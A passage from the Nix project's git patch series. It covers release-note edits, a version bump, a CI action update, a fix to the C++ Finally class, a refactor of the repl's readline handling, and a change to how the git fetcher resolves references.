-  When an inherit caused a duplicate attribute error the position of the error was not reported correctly, placing the error with the inherit itself or at the start of the bindings block instead of the offending attribute name.
+  When an `inherit` caused a duplicate attribute error the position of the error was not reported correctly, placing the error with the inherit itself or at the start of the bindings block instead of the offending attribute name.
 
 - `inherit (x) ...` evaluates `x` only once [#9847](https://github.com/NixOS/nix/pull/9847)
 
   `inherit (x) a b ...` now evaluates the expression `x` only once for all inherited attributes rather than once for each inherited attribute.
   This does not usually have a measurable impact, but side-effects (such as `builtins.trace`) would be duplicated and expensive expressions (such as derivations) could cause a measurable slowdown.
 
-- Functions are printed with more detail [#7145](https://github.com/NixOS/nix/issues/7145) [#9606](https://github.com/NixOS/nix/pull/9606)
-
-  Functions and `builtins` are printed with more detail in `nix repl`, `nix
-  eval`, `builtins.trace`, and most other places values are printed.
-
-  Before:
-
-  ```
-  $ nix repl nixpkgs
-  nix-repl> builtins.map
-  «primop»
-
-  nix-repl> builtins.map lib.id
-  «primop-app»
-
-  nix-repl> builtins.trace lib.id "my-value"
-  trace: 
-  "my-value"
-
-  $ nix eval --file functions.nix
-  { id = ; primop = ; primop-app = ; }
-  ```
-
-  After:
-
-  ```
-  $ nix repl nixpkgs
-  nix-repl> builtins.map
-  «primop map»
-
-  nix-repl> builtins.map lib.id
-  «partially applied primop map»
-
-  nix-repl> builtins.trace lib.id "my-value"
-  trace: «lambda id @ /nix/store/8rrzq23h2zq7sv5l2vhw44kls5w0f654-source/lib/trivial.nix:26:5»
-  "my-value"
-
-  $ nix eval --file functions.nix
-  { id = «lambda id @ /Users/wiggles/nix/functions.nix:2:8»; primop = «primop map»; primop-app = «partially applied primop map»; }
-  ```
-
-  This was actually released in Nix 2.20, but wasn't added to the release notes
-  so we're announcing it here. The historical release notes have been updated as well.
-
-  [type-error]: https://github.com/NixOS/nix/pull/9753
-  [coercion-error]: https://github.com/NixOS/nix/pull/9754
-
 - Store paths are allowed to start with `.` [#912](https://github.com/NixOS/nix/issues/912) [#9091](https://github.com/NixOS/nix/pull/9091) [#9095](https://github.com/NixOS/nix/pull/9095) [#9120](https://github.com/NixOS/nix/pull/9120) [#9121](https://github.com/NixOS/nix/pull/9121) [#9122](https://github.com/NixOS/nix/pull/9122) [#9130](https://github.com/NixOS/nix/pull/9130) [#9219](https://github.com/NixOS/nix/pull/9219) [#9224](https://github.com/NixOS/nix/pull/9224) [#9867](https://github.com/NixOS/nix/pull/9867)
 
   Leading periods were allowed by accident in Nix 2.4. The Nix team has considered this to be a bug, but this behavior has since been relied on by users, leading to unnecessary difficulties.
-  From now on, leading periods are officially, definitively supported. The names `.` and `..` are disallowed, as well as those starting with `.-` or `..-`.
+  From now on, leading periods are supported. The names `.` and `..` are disallowed, as well as those starting with `.-` or `..-`.
 
   Nix versions that denied leading periods are documented [in the issue](https://github.com/NixOS/nix/issues/912#issuecomment-1919583286).
 
-- Nix commands respect Ctrl-C [#7245](https://github.com/NixOS/nix/issues/7245) [#6995](https://github.com/NixOS/nix/pull/6995) [#9687](https://github.com/NixOS/nix/pull/9687)
-
-  Previously, many Nix commands would hang indefinitely if Ctrl-C was pressed
-  while performing various operations (including `nix develop`, `nix flake
-  update`, and so on). With several fixes to Nix's signal handlers, Nix commands
-  will now exit quickly after Ctrl-C is pressed.
-
-  This was actually released in Nix 2.20, but wasn't added to the release notes
-  so we're announcing it here. The historical release notes have been updated as well.
-
 - `nix repl` pretty-prints values [#9931](https://github.com/NixOS/nix/pull/9931)
 
   `nix repl` will now pretty-print values:
@@ -311,12 +253,6 @@
   nix-repl>
   ```
 
-- `nix repl` now respects Ctrl-C while printing values [#9927](https://github.com/NixOS/nix/pull/9927)
-
-  `nix repl` will now halt immediately when Ctrl-C is pressed while it's printing
-  a value. This is useful if you got curious about what would happen if you
-  printed all of Nixpkgs.
-
 - Cycle detection in `nix repl` is simpler and more reliable [#8672](https://github.com/NixOS/nix/issues/8672) [#9926](https://github.com/NixOS/nix/pull/9926)
 
   The cycle detection in `nix repl`, `nix eval`, `builtins.trace`, and everywhere

From 7f45b1c8d8caf4beeb68c981ae813d6251a7ee63 Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Mon, 11 Mar 2024 09:21:24 -0700
Subject: [PATCH 615/654] Add release note

---
 doc/manual/rl-next/nix-eval-derivations.md | 13 +++++++++++++
 1 file changed, 13 insertions(+)
 create mode 100644 doc/manual/rl-next/nix-eval-derivations.md

diff --git a/doc/manual/rl-next/nix-eval-derivations.md b/doc/manual/rl-next/nix-eval-derivations.md
new file mode 100644
index 000000000..ed0a73384
--- /dev/null
+++ b/doc/manual/rl-next/nix-eval-derivations.md
@@ -0,0 +1,13 @@
+---
+synopsis: "`nix eval` prints derivations as `.drv` paths"
+prs: 10200
+---
+
+`nix eval` will now print derivations as their `.drv` paths, rather than as
+attribute sets. This makes commands like `nix eval nixpkgs#bash` terminate
+instead of infinitely looping into recursive self-referential attributes:
+
+```ShellSession
+$ nix eval nixpkgs#bash
+«derivation /nix/store/m32cbgbd598f4w299g0hwyv7gbw6rqcg-bash-5.2p26.drv»
+```

From db36c9ca90794fe82e66d4e0fb7754875978de29 Mon Sep 17 00:00:00 2001
From: Viktor Sonesten 
Date: Mon, 11 Mar 2024 19:17:45 +0100
Subject: [PATCH 616/654] nix-copy: document --all --from local binary cache
 example

---
 src/nix/copy.md | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/src/nix/copy.md b/src/nix/copy.md
index 199006436..6ab7cdee3 100644
--- a/src/nix/copy.md
+++ b/src/nix/copy.md
@@ -11,6 +11,12 @@ R""(
   Note the `file://` - without this, the destination is a chroot
   store, not a binary cache.
 
+* Copy all store paths from a local binary cache in `/tmp/cache` to the local store:
+
+  ```console
+  # nix copy --all --from file:///tmp/cache
+  ```
+
 * Copy the entire current NixOS system closure to another machine via
   SSH:
 

From 222c38370fcf3ae52bc1883aafcadbbad3df7d1c Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Mon, 11 Mar 2024 21:16:10 +0100
Subject: [PATCH 617/654] Bump version

---
 .version | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.version b/.version
index db65e2167..f48f82fa2 100644
--- a/.version
+++ b/.version
@@ -1 +1 @@
-2.21.0
+2.22.0

From aa121dc318db9918545554aad14c490b7088cf59 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Mon, 11 Mar 2024 22:02:01 +0000
Subject: [PATCH 618/654] Bump cachix/install-nix-action from 25 to 26

Bumps [cachix/install-nix-action](https://github.com/cachix/install-nix-action) from 25 to 26.
- [Release notes](https://github.com/cachix/install-nix-action/releases)
- [Commits](https://github.com/cachix/install-nix-action/compare/v25...v26)

---
updated-dependencies:
- dependency-name: cachix/install-nix-action
  dependency-type: direct:production
  update-type: version-update:semver-major
...

Signed-off-by: dependabot[bot] 
---
 .github/workflows/ci.yml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 620a84b79..8bd355cca 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -20,7 +20,7 @@ jobs:
     - uses: actions/checkout@v4
       with:
         fetch-depth: 0
-    - uses: cachix/install-nix-action@v25
+    - uses: cachix/install-nix-action@v26
       with:
         # The sandbox would otherwise be disabled by default on Darwin
         extra_nix_config: "sandbox = true"
@@ -62,7 +62,7 @@ jobs:
       with:
         fetch-depth: 0
     - run: echo CACHIX_NAME="$(echo $GITHUB_REPOSITORY-install-tests | tr "[A-Z]/" "[a-z]-")" >> $GITHUB_ENV
-    - uses: cachix/install-nix-action@v25
+    - uses: cachix/install-nix-action@v26
       with:
         install_url: https://releases.nixos.org/nix/nix-2.20.3/install
     - uses: cachix/cachix-action@v14
@@ -84,7 +84,7 @@ jobs:
     steps:
     - uses: actions/checkout@v4
     - run: echo CACHIX_NAME="$(echo $GITHUB_REPOSITORY-install-tests | tr "[A-Z]/" "[a-z]-")" >> $GITHUB_ENV
-    - uses: cachix/install-nix-action@v25
+    - uses: cachix/install-nix-action@v26
       with:
         install_url: '${{needs.installer.outputs.installerURL}}'
         install_options: "--tarball-url-prefix https://${{ env.CACHIX_NAME }}.cachix.org/serve"
@@ -114,7 +114,7 @@ jobs:
     - uses: actions/checkout@v4
       with:
         fetch-depth: 0
-    - uses: cachix/install-nix-action@v25
+    - uses: cachix/install-nix-action@v26
       with:
         install_url: https://releases.nixos.org/nix/nix-2.20.3/install
     - run: echo CACHIX_NAME="$(echo $GITHUB_REPOSITORY-install-tests | tr "[A-Z]/" "[a-z]-")" >> $GITHUB_ENV

From 76aced691552e193e0225af40f8acf484cfeaefe Mon Sep 17 00:00:00 2001
From: Jade Lovelace 
Date: Mon, 26 Feb 2024 01:21:54 -0800
Subject: [PATCH 619/654] finally.hh: delete copy constructor which is a bad
 idea

---
 src/libutil/finally.hh | 9 ++++++++-
 1 file changed, 8 insertions(+), 1 deletion(-)

diff --git a/src/libutil/finally.hh b/src/libutil/finally.hh
index 4cae20a36..f9f0195a1 100644
--- a/src/libutil/finally.hh
+++ b/src/libutil/finally.hh
@@ -11,8 +11,15 @@ class [[nodiscard("Finally values must be used")]] Finally
 {
 private:
     Fn fun;
+    bool movedFrom = false;
 
 public:
     Finally(Fn fun) : fun(std::move(fun)) { }
-    ~Finally() { fun(); }
+    // Copying Finallys is definitely not a good idea and will cause them to be
+    // called twice.
+    Finally(Finally &other) = delete;
+    Finally(Finally &&other) : fun(std::move(other.fun)) {
+        other.movedFrom = true;
+    }
+    ~Finally() { if (!movedFrom) fun(); }
 };

From 70a6ce139bd39f915a6c2c499d741e2c27557dc0 Mon Sep 17 00:00:00 2001
From: Jade Lovelace 
Date: Mon, 26 Feb 2024 00:34:11 -0800
Subject: [PATCH 620/654] refactor: move readline stuff into its own file

This is in direct preparation for an automation mode of nix repl.
---
 src/libcmd/repl-interacter.cc | 175 ++++++++++++++++++++++++++++++++++
 src/libcmd/repl-interacter.hh |  48 ++++++++++
 src/libcmd/repl.cc            | 175 ++--------------------------------
 src/libcmd/repl.hh            |   5 -
 4 files changed, 232 insertions(+), 171 deletions(-)
 create mode 100644 src/libcmd/repl-interacter.cc
 create mode 100644 src/libcmd/repl-interacter.hh

diff --git a/src/libcmd/repl-interacter.cc b/src/libcmd/repl-interacter.cc
new file mode 100644
index 000000000..9aa1f7bb9
--- /dev/null
+++ b/src/libcmd/repl-interacter.cc
@@ -0,0 +1,175 @@
+#include "file-system.hh"
+#include "libcmd/repl.hh"
+#include 
+
+#ifdef USE_READLINE
+#include 
+#include 
+#else
+// editline < 1.15.2 doesn't wrap its API for C++ usage
+// (added in https://github.com/troglobit/editline/commit/91398ceb3427b730995357e9d120539fb9bb7461).
+// This results in linker errors due to name-mangling of editline C symbols.
+// For compatibility with these versions, we wrap the API here
+// (wrapping multiple times on newer versions is no problem).
+extern "C" {
+#include 
+}
+#endif
+
+#include "signals.hh"
+#include "finally.hh"
+#include "repl-interacter.hh"
+
+namespace nix {
+
+namespace {
+// Used to communicate to NixRepl::getLine whether a signal occurred in ::readline.
+volatile sig_atomic_t g_signal_received = 0;
+
+void sigintHandler(int signo)
+{
+    g_signal_received = signo;
+}
+};
+
+static detail::ReplCompleterMixin * curRepl; // ugly
+
+static char * completionCallback(char * s, int * match)
+{
+    auto possible = curRepl->completePrefix(s);
+    if (possible.size() == 1) {
+        *match = 1;
+        auto * res = strdup(possible.begin()->c_str() + strlen(s));
+        if (!res)
+            throw Error("allocation failure");
+        return res;
+    } else if (possible.size() > 1) {
+        auto checkAllHaveSameAt = [&](size_t pos) {
+            auto & first = *possible.begin();
+            for (auto & p : possible) {
+                if (p.size() <= pos || p[pos] != first[pos])
+                    return false;
+            }
+            return true;
+        };
+        size_t start = strlen(s);
+        size_t len = 0;
+        while (checkAllHaveSameAt(start + len))
+            ++len;
+        if (len > 0) {
+            *match = 1;
+            auto * res = strdup(std::string(*possible.begin(), start, len).c_str());
+            if (!res)
+                throw Error("allocation failure");
+            return res;
+        }
+    }
+
+    *match = 0;
+    return nullptr;
+}
+
+static int listPossibleCallback(char * s, char *** avp)
+{
+    auto possible = curRepl->completePrefix(s);
+
+    if (possible.size() > (INT_MAX / sizeof(char *)))
+        throw Error("too many completions");
+
+    int ac = 0;
+    char ** vp = nullptr;
+
+    auto check = [&](auto * p) {
+        if (!p) {
+            if (vp) {
+                while (--ac >= 0)
+                    free(vp[ac]);
+                free(vp);
+            }
+            throw Error("allocation failure");
+        }
+        return p;
+    };
+
+    vp = check((char **) malloc(possible.size() * sizeof(char *)));
+
+    for (auto & p : possible)
+        vp[ac++] = check(strdup(p.c_str()));
+
+    *avp = vp;
+
+    return ac;
+}
+
+ReadlineLikeInteracter::Guard ReadlineLikeInteracter::init(detail::ReplCompleterMixin * repl)
+{
+    // Allow nix-repl specific settings in .inputrc
+    rl_readline_name = "nix-repl";
+    try {
+        createDirs(dirOf(historyFile));
+    } catch (SystemError & e) {
+        logWarning(e.info());
+    }
+#ifndef USE_READLINE
+    el_hist_size = 1000;
+#endif
+    read_history(historyFile.c_str());
+    auto oldRepl = curRepl;
+    curRepl = repl;
+    Guard restoreRepl([oldRepl] { curRepl = oldRepl; });
+#ifndef USE_READLINE
+    rl_set_complete_func(completionCallback);
+    rl_set_list_possib_func(listPossibleCallback);
+#endif
+    return restoreRepl;
+}
+
+bool ReadlineLikeInteracter::getLine(std::string & input, const std::string & prompt)
+{
+    struct sigaction act, old;
+    sigset_t savedSignalMask, set;
+
+    auto setupSignals = [&]() {
+        act.sa_handler = sigintHandler;
+        sigfillset(&act.sa_mask);
+        act.sa_flags = 0;
+        if (sigaction(SIGINT, &act, &old))
+            throw SysError("installing handler for SIGINT");
+
+        sigemptyset(&set);
+        sigaddset(&set, SIGINT);
+        if (sigprocmask(SIG_UNBLOCK, &set, &savedSignalMask))
+            throw SysError("unblocking SIGINT");
+    };
+    auto restoreSignals = [&]() {
+        if (sigprocmask(SIG_SETMASK, &savedSignalMask, nullptr))
+            throw SysError("restoring signals");
+
+        if (sigaction(SIGINT, &old, 0))
+            throw SysError("restoring handler for SIGINT");
+    };
+
+    setupSignals();
+    char * s = readline(prompt.c_str());
+    Finally doFree([&]() { free(s); });
+    restoreSignals();
+
+    if (g_signal_received) {
+        g_signal_received = 0;
+        input.clear();
+        return true;
+    }
+
+    if (!s)
+        return false;
+    input += s;
+    input += '\n';
+    return true;
+}
+
+ReadlineLikeInteracter::~ReadlineLikeInteracter()
+{
+    write_history(historyFile.c_str());
+}
+
+};
diff --git a/src/libcmd/repl-interacter.hh b/src/libcmd/repl-interacter.hh
new file mode 100644
index 000000000..e549bab36
--- /dev/null
+++ b/src/libcmd/repl-interacter.hh
@@ -0,0 +1,48 @@
+#pragma once
+/// @file
+
+#include "finally.hh"
+#include "types.hh"
+#include 
+#include 
+
+namespace nix {
+
+namespace detail {
+/** Provides the completion hooks for the repl, without exposing its complete
+ * internals. */
+struct ReplCompleterMixin {
+    virtual StringSet completePrefix(const std::string & prefix) = 0;
+};
+};
+
+enum class ReplPromptType {
+    ReplPrompt,
+    ContinuationPrompt,
+};
+
+class ReplInteracter
+{
+public:
+    using Guard = Finally>;
+
+    virtual Guard init(detail::ReplCompleterMixin * repl) = 0;
+    /** Returns a boolean of whether the interacter got EOF */
+    virtual bool getLine(std::string & input, const std::string & prompt) = 0;
+    virtual ~ReplInteracter(){};
+};
+
+class ReadlineLikeInteracter : public virtual ReplInteracter
+{
+    std::string historyFile;
+public:
+    ReadlineLikeInteracter(std::string historyFile)
+        : historyFile(historyFile)
+    {
+    }
+    virtual Guard init(detail::ReplCompleterMixin * repl) override;
+    virtual bool getLine(std::string & input, const std::string & prompt) override;
+    virtual ~ReadlineLikeInteracter() override;
+};
+
+};
diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc
index 8b83608fa..8af3c5ff3 100644
--- a/src/libcmd/repl.cc
+++ b/src/libcmd/repl.cc
@@ -3,32 +3,17 @@
 #include 
 #include 
 
-#include 
-
-#ifdef USE_READLINE
-#include 
-#include 
-#else
-// editline < 1.15.2 don't wrap their API for C++ usage
-// (added in https://github.com/troglobit/editline/commit/91398ceb3427b730995357e9d120539fb9bb7461).
-// This results in linker errors due to to name-mangling of editline C symbols.
-// For compatibility with these versions, we wrap the API here
-// (wrapping multiple times on newer versions is no problem).
-extern "C" {
-#include 
-}
-#endif
-
+#include "libcmd/repl-interacter.hh"
 #include "repl.hh"
 
 #include "ansicolor.hh"
-#include "signals.hh"
 #include "shared.hh"
 #include "eval.hh"
 #include "eval-cache.hh"
 #include "eval-inline.hh"
 #include "eval-settings.hh"
 #include "attr-path.hh"
+#include "signals.hh"
 #include "store-api.hh"
 #include "log-store.hh"
 #include "common-eval-args.hh"
@@ -38,7 +23,6 @@ extern "C" {
 #include "flake/flake.hh"
 #include "flake/lockfile.hh"
 #include "users.hh"
-#include "terminal.hh"
 #include "editor-for.hh"
 #include "finally.hh"
 #include "markdown.hh"
@@ -75,6 +59,7 @@ enum class ProcessLineResult {
 
 struct NixRepl
     : AbstractNixRepl
+    , detail::ReplCompleterMixin
     #if HAVE_BOEHMGC
     , gc
     #endif
@@ -90,17 +75,16 @@ struct NixRepl
     int displ;
     StringSet varNames;
 
-    const Path historyFile;
+    std::unique_ptr interacter;
 
     NixRepl(const SearchPath & searchPath, nix::ref store,ref state,
             std::function getValues);
-    virtual ~NixRepl();
+    virtual ~NixRepl() = default;
 
     ReplExitStatus mainLoop() override;
     void initEnv() override;
 
-    StringSet completePrefix(const std::string & prefix);
-    bool getLine(std::string & input, const std::string & prompt);
+    virtual StringSet completePrefix(const std::string & prefix) override;
     StorePath getDerivationPath(Value & v);
     ProcessLineResult processLine(std::string line);
 
@@ -143,16 +127,10 @@ NixRepl::NixRepl(const SearchPath & searchPath, nix::ref store, refstaticBaseEnv.get()))
-    , historyFile(getDataDir() + "/nix/repl-history")
+    , interacter(make_unique(getDataDir() + "/nix/repl-history"))
 {
 }
 
-
-NixRepl::~NixRepl()
-{
-    write_history(historyFile.c_str());
-}
-
 void runNix(Path program, const Strings & args,
     const std::optional & input = {})
 {
@@ -169,79 +147,6 @@ void runNix(Path program, const Strings & args,
     return;
 }
 
-static NixRepl * curRepl; // ugly
-
-static char * completionCallback(char * s, int *match) {
-  auto possible = curRepl->completePrefix(s);
-  if (possible.size() == 1) {
-    *match = 1;
-    auto *res = strdup(possible.begin()->c_str() + strlen(s));
-    if (!res) throw Error("allocation failure");
-    return res;
-  } else if (possible.size() > 1) {
-    auto checkAllHaveSameAt = [&](size_t pos) {
-      auto &first = *possible.begin();
-      for (auto &p : possible) {
-        if (p.size() <= pos || p[pos] != first[pos])
-          return false;
-      }
-      return true;
-    };
-    size_t start = strlen(s);
-    size_t len = 0;
-    while (checkAllHaveSameAt(start + len)) ++len;
-    if (len > 0) {
-      *match = 1;
-      auto *res = strdup(std::string(*possible.begin(), start, len).c_str());
-      if (!res) throw Error("allocation failure");
-      return res;
-    }
-  }
-
-  *match = 0;
-  return nullptr;
-}
-
-static int listPossibleCallback(char *s, char ***avp) {
-  auto possible = curRepl->completePrefix(s);
-
-  if (possible.size() > (INT_MAX / sizeof(char*)))
-    throw Error("too many completions");
-
-  int ac = 0;
-  char **vp = nullptr;
-
-  auto check = [&](auto *p) {
-    if (!p) {
-      if (vp) {
-        while (--ac >= 0)
-          free(vp[ac]);
-        free(vp);
-      }
-      throw Error("allocation failure");
-    }
-    return p;
-  };
-
-  vp = check((char **)malloc(possible.size() * sizeof(char*)));
-
-  for (auto & p : possible)
-    vp[ac++] = check(strdup(p.c_str()));
-
-  *avp = vp;
-
-  return ac;
-}
-
-namespace {
-    // Used to communicate to NixRepl::getLine whether a signal occurred in ::readline.
-    volatile sig_atomic_t g_signal_received = 0;
-
-    void sigintHandler(int signo) {
-        g_signal_received = signo;
-    }
-}
-
 static std::ostream & showDebugTrace(std::ostream & out, const PosTable & positions, const DebugTrace & dt)
 {
     if (dt.isError)
@@ -281,24 +186,7 @@ ReplExitStatus NixRepl::mainLoop()
 
     loadFiles();
 
-    // Allow nix-repl specific settings in .inputrc
-    rl_readline_name = "nix-repl";
-    try {
-        createDirs(dirOf(historyFile));
-    } catch (SystemError & e) {
-        logWarning(e.info());
-    }
-#ifndef USE_READLINE
-    el_hist_size = 1000;
-#endif
-    read_history(historyFile.c_str());
-    auto oldRepl = curRepl;
-    curRepl = this;
-    Finally restoreRepl([&] { curRepl = oldRepl; });
-#ifndef USE_READLINE
-    rl_set_complete_func(completionCallback);
-    rl_set_list_possib_func(listPossibleCallback);
-#endif
+    auto _guard = interacter->init(static_cast(this));
 
     std::string input;
 
@@ -307,7 +195,7 @@ ReplExitStatus NixRepl::mainLoop()
         logger->pause();
         // When continuing input from previous lines, don't print a prompt, just align to the same
         // number of chars as the prompt.
-        if (!getLine(input, input.empty() ? "nix-repl> " : "          ")) {
+        if (!interacter->getLine(input, input.empty() ? "nix-repl> " : "          ")) {
             // Ctrl-D should exit the debugger.
             state->debugStop = false;
             logger->cout("");
@@ -356,51 +244,6 @@ ReplExitStatus NixRepl::mainLoop()
     }
 }
 
-
-bool NixRepl::getLine(std::string & input, const std::string & prompt)
-{
-    struct sigaction act, old;
-    sigset_t savedSignalMask, set;
-
-    auto setupSignals = [&]() {
-        act.sa_handler = sigintHandler;
-        sigfillset(&act.sa_mask);
-        act.sa_flags = 0;
-        if (sigaction(SIGINT, &act, &old))
-            throw SysError("installing handler for SIGINT");
-
-        sigemptyset(&set);
-        sigaddset(&set, SIGINT);
-        if (sigprocmask(SIG_UNBLOCK, &set, &savedSignalMask))
-            throw SysError("unblocking SIGINT");
-    };
-    auto restoreSignals = [&]() {
-        if (sigprocmask(SIG_SETMASK, &savedSignalMask, nullptr))
-            throw SysError("restoring signals");
-
-        if (sigaction(SIGINT, &old, 0))
-            throw SysError("restoring handler for SIGINT");
-    };
-
-    setupSignals();
-    char * s = readline(prompt.c_str());
-    Finally doFree([&]() { free(s); });
-    restoreSignals();
-
-    if (g_signal_received) {
-        g_signal_received = 0;
-        input.clear();
-        return true;
-    }
-
-    if (!s)
-      return false;
-    input += s;
-    input += '\n';
-    return true;
-}
-
-
 StringSet NixRepl::completePrefix(const std::string & prefix)
 {
     StringSet completions;
diff --git a/src/libcmd/repl.hh b/src/libcmd/repl.hh
index 21aa8bfc7..aac79ec74 100644
--- a/src/libcmd/repl.hh
+++ b/src/libcmd/repl.hh
@@ -3,11 +3,6 @@
 
 #include "eval.hh"
 
-#if HAVE_BOEHMGC
-#define GC_INCLUDE_NEW
-#include 
-#endif
-
 namespace nix {
 
 struct AbstractNixRepl

From ea31b8a117e0a2e18809fd3921209d106d9040c8 Mon Sep 17 00:00:00 2001
From: Jade Lovelace 
Date: Mon, 26 Feb 2024 00:43:44 -0800
Subject: [PATCH 621/654] refactor: repl prompts are now the job of the
 interacter

---
 src/libcmd/repl-interacter.cc | 19 +++++++++++++++----
 src/libcmd/repl-interacter.hh |  4 ++--
 src/libcmd/repl.cc            |  2 +-
 3 files changed, 18 insertions(+), 7 deletions(-)

diff --git a/src/libcmd/repl-interacter.cc b/src/libcmd/repl-interacter.cc
index 9aa1f7bb9..3e34ecdb6 100644
--- a/src/libcmd/repl-interacter.cc
+++ b/src/libcmd/repl-interacter.cc
@@ -1,5 +1,3 @@
-#include "file-system.hh"
-#include "libcmd/repl.hh"
 #include 
 
 #ifdef USE_READLINE
@@ -19,6 +17,8 @@ extern "C" {
 #include "signals.hh"
 #include "finally.hh"
 #include "repl-interacter.hh"
+#include "file-system.hh"
+#include "libcmd/repl.hh"
 
 namespace nix {
 
@@ -124,7 +124,18 @@ ReadlineLikeInteracter::Guard ReadlineLikeInteracter::init(detail::ReplCompleter
     return restoreRepl;
 }
 
-bool ReadlineLikeInteracter::getLine(std::string & input, const std::string & prompt)
+static constexpr const char * promptForType(ReplPromptType promptType)
+{
+    switch (promptType) {
+    case ReplPromptType::ReplPrompt:
+        return "nix-repl> ";
+    case ReplPromptType::ContinuationPrompt:
+        return "          ";
+    }
+    assert(false);
+}
+
+bool ReadlineLikeInteracter::getLine(std::string & input, ReplPromptType promptType)
 {
     struct sigaction act, old;
     sigset_t savedSignalMask, set;
@@ -150,7 +161,7 @@ bool ReadlineLikeInteracter::getLine(std::string & input, const std::string & pr
     };
 
     setupSignals();
-    char * s = readline(prompt.c_str());
+    char * s = readline(promptForType(promptType));
     Finally doFree([&]() { free(s); });
     restoreSignals();
 
diff --git a/src/libcmd/repl-interacter.hh b/src/libcmd/repl-interacter.hh
index e549bab36..cc70efd07 100644
--- a/src/libcmd/repl-interacter.hh
+++ b/src/libcmd/repl-interacter.hh
@@ -28,7 +28,7 @@ public:
 
     virtual Guard init(detail::ReplCompleterMixin * repl) = 0;
     /** Returns a boolean of whether the interacter got EOF */
-    virtual bool getLine(std::string & input, const std::string & prompt) = 0;
+    virtual bool getLine(std::string & input, ReplPromptType promptType) = 0;
     virtual ~ReplInteracter(){};
 };
 
@@ -41,7 +41,7 @@ public:
     {
     }
     virtual Guard init(detail::ReplCompleterMixin * repl) override;
-    virtual bool getLine(std::string & input, const std::string & prompt) override;
+    virtual bool getLine(std::string & input, ReplPromptType promptType) override;
     virtual ~ReadlineLikeInteracter() override;
 };
 
diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc
index 8af3c5ff3..228d66f5e 100644
--- a/src/libcmd/repl.cc
+++ b/src/libcmd/repl.cc
@@ -195,7 +195,7 @@ ReplExitStatus NixRepl::mainLoop()
         logger->pause();
         // When continuing input from previous lines, don't print a prompt, just align to the same
         // number of chars as the prompt.
-        if (!interacter->getLine(input, input.empty() ? "nix-repl> " : "          ")) {
+        if (!interacter->getLine(input, input.empty() ? ReplPromptType::ReplPrompt : ReplPromptType::ContinuationPrompt)) {
             // Ctrl-D should exit the debugger.
             state->debugStop = false;
             logger->cout("");

From e5840d57605bdc67fa1a1948e601734e99d1cb91 Mon Sep 17 00:00:00 2001
From: Emanuel Czirai 
Date: Wed, 13 Mar 2024 20:35:24 +0100
Subject: [PATCH 622/654] typo consant->constant in context.cc

---
 src/libexpr/primops/context.cc | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/libexpr/primops/context.cc b/src/libexpr/primops/context.cc
index 1eec8b316..88502fe2d 100644
--- a/src/libexpr/primops/context.cc
+++ b/src/libexpr/primops/context.cc
@@ -137,7 +137,7 @@ static RegisterPrimOp primop_addDrvOutputDependencies({
     .name = "__addDrvOutputDependencies",
     .args = {"s"},
     .doc = R"(
-      Create a copy of the given string where a single consant string context element is turned into a "derivation deep" string context element.
+      Create a copy of the given string where a single constant string context element is turned into a "derivation deep" string context element.
 
       The store path that is the constant string context element should point to a valid derivation, and end in `.drv`.
 

From 60c2d15f5a7db86eb79c11c4a863789d186e8650 Mon Sep 17 00:00:00 2001
From: Bouke van der Bijl 
Date: Thu, 14 Mar 2024 14:04:51 +0100
Subject: [PATCH 623/654] git fetcher: use resolveRef for getting revision of
 reference

* Add regression test
* Fix 'no repo' test so it doesn't succeed if the data is still in cache
* Use git_revparse_single inside git-utils instead of reimplementing the same logic.
---
 src/libfetchers/git-utils.cc | 24 ++++--------------------
 src/libfetchers/git.cc       |  2 +-
 tests/functional/fetchGit.sh |  9 +++++++++
 3 files changed, 14 insertions(+), 21 deletions(-)

diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc
index 9cae9034e..b723554cc 100644
--- a/src/libfetchers/git-utils.cc
+++ b/src/libfetchers/git-utils.cc
@@ -21,6 +21,7 @@
 #include 
 #include 
 #include 
+#include 
 #include 
 #include 
 #include 
@@ -199,27 +200,10 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this
 
     Hash resolveRef(std::string ref) override
     {
-        // Handle revisions used as refs.
-        {
-            git_oid oid;
-            if (git_oid_fromstr(&oid, ref.c_str()) == 0)
-                return toHash(oid);
-        }
-
-        // Resolve short names like 'master'.
-        Reference ref2;
-        if (!git_reference_dwim(Setter(ref2), *this, ref.c_str()))
-            ref = git_reference_name(ref2.get());
-
-        // Resolve full references like 'refs/heads/master'.
-        Reference ref3;
-        if (git_reference_lookup(Setter(ref3), *this, ref.c_str()))
+        Object object;
+        if (git_revparse_single(Setter(object), *this, ref.c_str()))
             throw Error("resolving Git reference '%s': %s", ref, git_error_last()->message);
-
-        auto oid = git_reference_target(ref3.get());
-        if (!oid)
-            throw Error("cannot get OID for Git reference '%s'", git_reference_name(ref3.get()));
-
+        auto oid = git_object_id(object.get());
         return toHash(*oid);
     }
 
diff --git a/src/libfetchers/git.cc b/src/libfetchers/git.cc
index 25eabb1dc..34cfd3f5b 100644
--- a/src/libfetchers/git.cc
+++ b/src/libfetchers/git.cc
@@ -585,7 +585,7 @@ struct GitInputScheme : InputScheme
                         repoInfo.url
                         );
             } else
-                input.attrs.insert_or_assign("rev", Hash::parseAny(chomp(readFile(localRefFile)), HashAlgorithm::SHA1).gitRev());
+                input.attrs.insert_or_assign("rev", repo->resolveRef(ref).gitRev());
 
             // cache dir lock is removed at scope end; we will only use read-only operations on specific revisions in the remainder
         }
diff --git a/tests/functional/fetchGit.sh b/tests/functional/fetchGit.sh
index 3f2d0d5fb..74d6de4e3 100644
--- a/tests/functional/fetchGit.sh
+++ b/tests/functional/fetchGit.sh
@@ -43,10 +43,18 @@ path0_=$(nix eval --impure --raw --expr "(builtins.fetchTree git+file://$TEST_RO
 export _NIX_FORCE_HTTP=1
 [[ $(tail -n 1 $path0/hello) = "hello" ]]
 
+# Nuke the cache
+rm -rf $TEST_HOME/.cache/nix
+
 # Fetch the default branch.
